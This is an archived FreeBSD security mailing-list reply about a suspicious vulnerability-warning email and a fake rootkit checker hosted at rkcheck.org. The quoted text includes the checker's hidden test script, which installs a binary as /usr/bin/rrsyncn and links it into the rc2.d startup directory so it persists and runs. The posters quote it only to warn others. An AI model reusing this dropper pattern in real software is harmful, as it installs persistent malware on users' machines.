Date: Wed, 25 Feb 2015 16:41:19 -0400 From: Joseph Mingrone <jrm@ftfl.ca> To: Philip Jocks <pjlists@netzkommune.com> Cc: freebsd-security@freebsd.org Subject: Re: has my 10.1-RELEASE system been compromised Message-ID: <86bnkhyb9s.fsf@gly.ftfl.ca> In-Reply-To: <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> (Philip Jocks's message of "Wed, 25 Feb 2015 21:34:21 %2B0100") References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com>
index | next in thread | previous in thread | raw e-mail
Philip Jocks <pjlists@netzkommune.com> writes: > it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which > was registered a few days ago and looks like a tampered version of chkrootkit. I > hope, nobody installed it anywhere, it seems to execute > rkcheck/tests/.unit/test.sh which contains > > #!/bin/bash > > cp tests/.unit/test /usr/bin/rrsyncn > chmod +x /usr/bin/rrsyncn > rm -fr /etc/rc2.d/S98rsyncn > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn > /usr/bin/rrsyncn > exit > > That doesn't look like something you'd want on your box... I downloaded it as well, but also became suspicious (for a variety of reasons) and didn't run it. Fortunately /bin/bash doesn't exist on our systems. Some evidence to confirm or refute the authenticity of the email reporting our IPs as vulnerable would be helpful. Josephhome | help
Want to link to this message? Use this
URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?86bnkhyb9s.fsf>